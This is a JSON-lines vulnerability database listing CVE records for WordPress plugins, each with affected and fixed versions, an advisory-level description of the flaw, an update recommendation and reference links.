{"CVE_ID":"CVE-2024-13315","slug":"shopwarden","versionImpact":"1.0.11","versionEndExcluding":"1.0.12","description":"The Shopwarden \u2013 Automated WooCommerce monitoring & testing plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.11. This is due to missing or incorrect nonce validation on the save_setting() function. This makes it possible for unauthenticated attackers to update arbitrary options and achieve privilege escalation via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.0.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shopwarden\\\/trunk\\\/shopwarden.php#L112\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shopwarden\\\/trunk\\\/shopwarden.php#L112\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3238978%40shopwarden&new=3238978%40shopwarden&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3238978%40shopwarden&new=3238978%40shopwarden&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b11ed628-f736-4262-80a2-62b32948a3a4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b11ed628-f736-4262-80a2-62b32948a3a4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7239","slug":"wp-dashboard-notes","versionImpact":"1.0.10","versionEndExcluding":"1.0.11","description":"The WP Dashboard Notes WordPress plugin before 1.0.11 does not validate that the user has access to the post_id parameter in its wpdn_update_note AJAX action. This allows users with a role of contributor and above to update notes created by other users.","recommendation":"Update to version 1.0.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e6afe50-27f9-41fa-a94b-f44df0850e2c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e6afe50-27f9-41fa-a94b-f44df0850e2c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7198","slug":"wp-dashboard-notes","versionImpact":"1.0.10","versionEndExcluding":"1.0.11","description":"The WP Dashboard Notes WordPress plugin before 1.0.11 is vulnerable to Insecure Direct Object References (IDOR) in post_id= parameter. Authenticated users are able to delete private notes associated with different user accounts. This poses a significant security risk as it violates the principle of least privilege and compromises the integrity and privacy of user data.","recommendation":"Update to version 1.0.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/75fbee63-d622-441f-8675-082907b0b1e6\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/75fbee63-d622-441f-8675-082907b0b1e6\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2708","slug":"video-slider-with-thumbnails","versionEndExcluding":"1.0.11","description":"The Video Gallery plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018search_term\u2019 parameter in versions up to, and including, 1.0.10 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/video-slider-with-thumbnails\\\/tags\\\/1.0.11\\\/video-slider-with-thumbnails.php#L1105\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/video-slider-with-thumbnails\\\/tags\\\/1.0.11\\\/video-slider-with-thumbnails.php#L1105\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8cfbad9f-61ba-4216-9078-c1e7e809899a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8cfbad9f-61ba-4216-9078-c1e7e809899a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/video-slider-with-thumbnails\\\/tags\\\/1.0.10\\\/video-slider-with-thumbnails.php#L1103\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/video-slider-with-thumbnails\\\/tags\\\/1.0.10\\\/video-slider-with-thumbnails.php#L1103\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11333","slug":"hls-player","versionImpact":"1.0.10","versionEndExcluding":"1.0.11","description":"The HLS Player plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'hls_player' shortcode in all versions up to, and including, 1.0.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3197684\\\/hls-player\\\/tags\\\/1.0.11\\\/hls-player.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3197684\\\/hls-player\\\/tags\\\/1.0.11\\\/hls-player.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/808695a2-4d34-4b43-88a6-7da788100f2e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/808695a2-4d34-4b43-88a6-7da788100f2e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0866","slug":"check-email","versionImpact":"1.0.9","versionEndExcluding":"1.0.10","description":"The Check & Log Email plugin for WordPress is vulnerable to Unauthenticated Hook Injection in all versions up to, and including, 1.0.9 via the check_nonce function. This makes it possible for unauthenticated attackers to execute actions with hooks in WordPress under certain circumstances. The action the attacker wishes to execute needs to have a nonce check, and the nonce needs to be known to the attacker. Furthermore, the absence of a capability check is a requirement.","recommendation":"Update to version 1.0.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ae9307c-680c-43c7-8246-a3e6149c1fb6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ae9307c-680c-43c7-8246-a3e6149c1fb6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3050794%40check-email&new=3050794%40check-email&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3050794%40check-email&new=3050794%40check-email&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3070","slug":"last-viewed-posts","versionImpact":"1.0.0","versionEndExcluding":"1.0.1","description":"The Last Viewed Posts by WPBeginner plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.0.0 via deserialization of untrusted input from the LastViewedPosts Cookie. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 1.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6c5cc05-b147-46f6-aaa9-4c82aae1b544?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6c5cc05-b147-46f6-aaa9-4c82aae1b544?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3062246%40last-viewed-posts&new=3062246%40last-viewed-posts&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3062246%40last-viewed-posts&new=3062246%40last-viewed-posts&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2014-125100","slug":"job-board","versionEndExcluding":"1.0.1","description":"A vulnerability classified as problematic was found in BestWebSoft Job Board Plugin 1.0.0 on WordPress. This vulnerability affects unknown code. The manipulation leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 1.0.1 is able to address this issue. The name of the patch is dbb71deee071422ce3e663fbcdce3ad24886f940. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-227764.","refs":"[{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.227764\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.227764\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.227764\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.227764\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/job-board\\\/commit\\\/dbb71deee071422ce3e663fbcdce3ad24886f940\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/job-board\\\/commit\\\/dbb71deee071422ce3e663fbcdce3ad24886f940\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10130","slug":"circle-image-slider-with-lightbox","versionImpact":"1.0","versionEndExcluding":"1.0.1","description":"The Team Circle Image Slider With Lightbox plugin for WordPress is vulnerable to Cross-Site Request Forgery in version 1.0. This is due to missing or incorrect nonce validation on the circle_thumbnail_slider_with_lightbox_image_management_func() function. This makes it possible for unauthenticated attackers to edit image data which can be used to inject malicious JavaScript, along with deleting images, and uploading malicious files via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6a54470-fc66-43c5-a523-ddbefd47ee1f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6a54470-fc66-43c5-a523-ddbefd47ee1f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=1269993%40circle-image-slider-with-lightbox&new=1269993%40circle-image-slider-with-lightbox&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=1269993%40circle-image-slider-with-lightbox&new=1269993%40circle-image-slider-with-lightbox&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5821","slug":"wp-responsive-thumbnail-slider","versionImpact":"1.0","versionEndExcluding":"1.0.1","description":"The Thumbnail carousel slider plugin for WordPress is vulnerable to Cross-Site Request Forgery in version 1.0. This is due to missing nonce validation on the deleteselected function. This makes it possible for unauthenticated attackers to delete sliders in bulk via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/1263536\\\/wp-responsive-slider-with-lightbox\\\/trunk\\\/wp-responsive-slider-with-lightbox.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/1263536\\\/wp-responsive-slider-with-lightbox\\\/trunk\\\/wp-responsive-slider-with-lightbox.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-responsive-thumbnail-slider\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-responsive-thumbnail-slider\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bde75c5a-b0b7-4f26-91e9-dd4816e276c9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bde75c5a-b0b7-4f26-91e9-dd4816e276c9?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5820","slug":"wp-responsive-slider-with-lightbox","versionImpact":"1.0","versionEndExcluding":"1.0.1","description":"The Thumbnail Slider With Lightbox plugin for WordPress is vulnerable to Cross-Site Request Forgery in version 1.0. This is due to missing or incorrect nonce validation on the addedit functionality. This makes it possible for unauthenticated attackers to upload arbitrary files via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=1263536%40wp-responsive-slider-with-lightbox&new=1263536%40wp-responsive-slider-with-lightbox&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=1263536%40wp-responsive-slider-with-lightbox&new=1263536%40wp-responsive-slider-with-lightbox&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e51e1cd2-6de9-4820-8bba-1c6b5053e2c1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e51e1cd2-6de9-4820-8bba-1c6b5053e2c1?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-responsive-slider-with-lightbox\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-responsive-slider-with-lightbox\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10120","slug":"wds-multisite-aggregate","versionImpact":"1.0.0","versionEndExcluding":"1.0.1","description":"A vulnerability, which was classified as problematic, was found in WDS Multisite Aggregate Plugin up to 1.0.0 on WordPress. Affected is the function update_options of the file includes\/WDS_Multisite_Aggregate_Options.php. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 1.0.1 is able to address this issue. The name of the patch is 49e0bbcb6ff70e561365d9e0d26426598f63ca12. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-233364.","recommendation":"Update to version 1.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.233364\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.233364\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/wds-multisite-aggregate\\\/commit\\\/49e0bbcb6ff70e561365d9e0d26426598f63ca12\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/wds-multisite-aggregate\\\/commit\\\/49e0bbcb6ff70e561365d9e0d26426598f63ca12\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.233364\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.233364\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5945","slug":"wp-responsive-video-gallery-with-lightbox","versionImpact":"1.0","versionEndExcluding":"1.0.1","description":"The video carousel slider with lightbox plugin for WordPress is vulnerable to Cross-Site Request Forgery in version 1.0. This is due to missing or incorrect nonce validation on the responsive_video_gallery_with_lightbox_video_management_func() function. This makes it possible for unauthenticated attackers to delete videos hosted from the video slider via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-video-gallery-with-lightbox\\\/tags\\\/1.0.1\\\/wp-responsive-video-gallery-with-lightbox.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-video-gallery-with-lightbox\\\/tags\\\/1.0.1\\\/wp-responsive-video-gallery-with-lightbox.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/wp-responsive-video-gallery-with-lightbox\\\/blob\\\/master\\\/wp-responsive-video-gallery-with-lightbox.php\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/wp-responsive-video-gallery-with-lightbox\\\/blob\\\/master\\\/wp-responsive-video-gallery-with-lightbox.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc052b00-65a7-4668-8bdd-b06d69d12a4a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc052b00-65a7-4668-8bdd-b06d69d12a4a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10144","slug":"wp-responsive-thumbnail-slider","versionEndExcluding":"1.0.1","description":"The Responsive Thumbnail Slider plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type sanitization in the via the image uploader in versions up to 1.0.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload arbitrary files on the affected sites server using a double extension which may make remote code execution possible.","recommendation":"Update to version 1.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/cxsecurity.com\\\/issue\\\/WLB-2015080170\",\"name\":\"https:\\\/\\\/cxsecurity.com\\\/issue\\\/WLB-2015080170\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/raw.githubusercontent.com\\\/rapid7\\\/metasploit-framework\\\/master\\\/modules\\\/exploits\\\/multi\\\/http\\\/wp_responsive_thumbnail_slider_upload.rb\",\"name\":\"https:\\\/\\\/raw.githubusercontent.com\\\/rapid7\\\/metasploit-framework\\\/master\\\/modules\\\/exploits\\\/multi\\\/http\\\/wp_responsive_thumbnail_slider_upload.rb\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-thumbnail-carousel-slider-arbitrary-file-upload-1-0\\\/\",\"name\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-thumbnail-carousel-slider-arbitrary-file-upload-1-0\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/37998\",\"name\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/37998\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6c396ae6-d34c-4554-b670-28868dc136a5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6c396ae6-d34c-4554-b670-28868dc136a5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3135","slug":"mailtree-log-mail","versionEndExcluding":"1.0.1","description":"The Mailtree Log Mail plugin for WordPress is vulnerable to Stored Cross-Site Scripting via an email subject in versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24d0229c-0f1b-42df-b89a-ce0b8a3fda7e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24d0229c-0f1b-42df-b89a-ce0b8a3fda7e?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2928716\\\/mailtree-log-mail\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2928716\\\/mailtree-log-mail\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6384","slug":"wp-user-profile-avatar","versionImpact":"1.0.0","versionEndExcluding":"1.0.1","description":"The WP User Profile Avatar WordPress plugin before 1.0.1 does not properly check for authorisation, allowing authors to delete and update arbitrary avatar","recommendation":"Update to version 1.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fbdefab4-614b-493b-a9ae-c5aeff8323ef\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fbdefab4-614b-493b-a9ae-c5aeff8323ef\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-51700","slug":"WP-Mobile-BankID-Integration","versionEndExcluding":"1.0.1","description":"Unofficial Mobile BankID Integration for WordPress lets users employ Mobile BankID to authenticate themselves on your WordPress site. Prior to 1.0.1, WP-Mobile-BankID-Integration is affected by a vulnerability classified as a Deserialization of Untrusted Data vulnerability, specifically impacting scenarios where an attacker can manipulate the database. If unauthorized actors gain access to the database, they could exploit this vulnerability to execute object injection attacks. This could lead to unauthorized code execution, data manipulation, or data exfiltration within the WordPress environment.  Users of the plugin should upgrade to version 1.0.1 (or later), where the serialization and deserialization of OrderResponse objects have been switched out to an array stored as JSON.  A possible workaround for users unable to upgrade immediately is to enforce stricter access controls on the database, ensuring that only trusted and authorized entities can modify data. Additionally, implementing monitoring tools to detect unusual database activities could help identify and mitigate potential exploitation attempts.\n","recommendation":"Update to version 1.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/jamieblomerus\\\/WP-Mobile-BankID-Integration\\\/security\\\/advisories\\\/GHSA-pqwp-qrp7-grg4\",\"name\":\"https:\\\/\\\/github.com\\\/jamieblomerus\\\/WP-Mobile-BankID-Integration\\\/security\\\/advisories\\\/GHSA-pqwp-qrp7-grg4\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/jamieblomerus\\\/WP-Mobile-BankID-Integration\\\/commit\\\/8251c6298a995ccf4f26c43f03ed11a275dd0c5f\",\"name\":\"https:\\\/\\\/github.com\\\/jamieblomerus\\\/WP-Mobile-BankID-Integration\\\/commit\\\/8251c6298a995ccf4f26c43f03ed11a275dd0c5f\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8245","slug":"gamipress-reset-user","versionImpact":"1.0.0","versionEndExcluding":"1.0.1","description":"The GamiPress  WordPress plugin before 1.0.1 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"Update to version 1.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3fb6292c-502c-481a-8223-ecda03d4c3fe\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3fb6292c-502c-481a-8223-ecda03d4c3fe\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6719","slug":"offload-videos-bunny-netaws-s3","versionImpact":"1.0.0","versionEndExcluding":"1.0.1","description":"The Offload Videos  WordPress plugin before 1.0.1 does not have CSRF check in place when updating its settings, which could allow low privilege users to update them via a CSRF attack","recommendation":"Update to version 1.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1dc7caac-a36e-4313-a8be-c6b13e564924\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1dc7caac-a36e-4313-a8be-c6b13e564924\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7641","slug":"assistant-for-nextgen-gallery","versionImpact":"1.0.0","versionEndExcluding":"1.0.0","description":"The Assistant for NextGEN Gallery plugin for WordPress is vulnerable to arbitrary directory deletion due to insufficient file path validation in the \/wp-json\/nextgenassistant\/v1.0.0\/control REST endpoint in all versions up to, and including, 1.0.9. This makes it possible for unauthenticated attackers to delete arbitrary directories on the server, which can cause a complete loss of availability.","refs":"[{\"url\":\"http:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/assistant-for-nextgen-gallery\\\/trunk\\\/nextgenassistant.php#L163\",\"name\":\"http:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/assistant-for-nextgen-gallery\\\/trunk\\\/nextgenassistant.php#L163\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/assistant-for-nextgen-gallery\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/assistant-for-nextgen-gallery\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07ebb176-a1f8-4a5c-8d81-a83fda4b0af3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07ebb176-a1f8-4a5c-8d81-a83fda4b0af3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0033","slug":"pdf-viewer","versionEndExcluding":"1.0.0","description":"The PDF Viewer WordPress plugin before 1.0.0 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2d9ae43b-75a7-4fcc-bce3-d9e9d7a97ec0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2d9ae43b-75a7-4fcc-bce3-d9e9d7a97ec0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5057","slug":"activitypub","versionImpact":"0.17.0","versionEndExcluding":"1.0.0","description":"The ActivityPub WordPress plugin before 1.0.0 does not escape user metadata before outputting them in mentions, which could allow users with a role of Contributor and above to perform Stored XSS attacks","recommendation":"Update to version 1.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/58a63507-f0fd-46f1-a80c-6b1c41dddcf5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/58a63507-f0fd-46f1-a80c-6b1c41dddcf5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3746","slug":"activitypub","versionImpact":"0.17.0","versionEndExcluding":"1.0.0","description":"The ActivityPub WordPress plugin before 1.0.0 does not sanitize and escape some data from post content, which could allow contributor and above role to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 1.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c15a6032-6495-47a8-828c-37e55ed9665a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c15a6032-6495-47a8-828c-37e55ed9665a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3707","slug":"activitypub","versionImpact":"0.17.0","versionEndExcluding":"1.0.0","description":"The ActivityPub WordPress plugin before 1.0.0 does not ensure that post contents to be displayed are public and belong to the plugin, allowing any authenticated user, such as subscriber to retrieve the content of arbitrary post (such as draft and private) via an IDOR vector. Password protected posts are not affected by this issue.","recommendation":"Update to version 1.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/541bbe4c-3295-4073-901d-763556269f48\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/541bbe4c-3295-4073-901d-763556269f48\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3706","slug":"activitypub","versionImpact":"0.17.0","versionEndExcluding":"1.0.0","description":"The ActivityPub WordPress plugin before 1.0.0 does not ensure that post titles to be displayed are public and belong to the plugin, allowing any authenticated user, such as subscriber to retrieve the title of arbitrary post (such as draft and private) via an IDOR vector","recommendation":"Update to version 1.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/daa4d93a-f8b1-4809-a18e-8ab63a05de5a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/daa4d93a-f8b1-4809-a18e-8ab63a05de5a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0363","slug":"scheduled-announcements-widget","versionEndExcluding":"1.0","description":"The Scheduled Announcements Widget WordPress plugin before 1.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6d332a47-e96c-455b-9e8f-db6dbb59b518\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6d332a47-e96c-455b-9e8f-db6dbb59b518\",\"refsource\":\"MISC\",\"tags\":[]}]"}
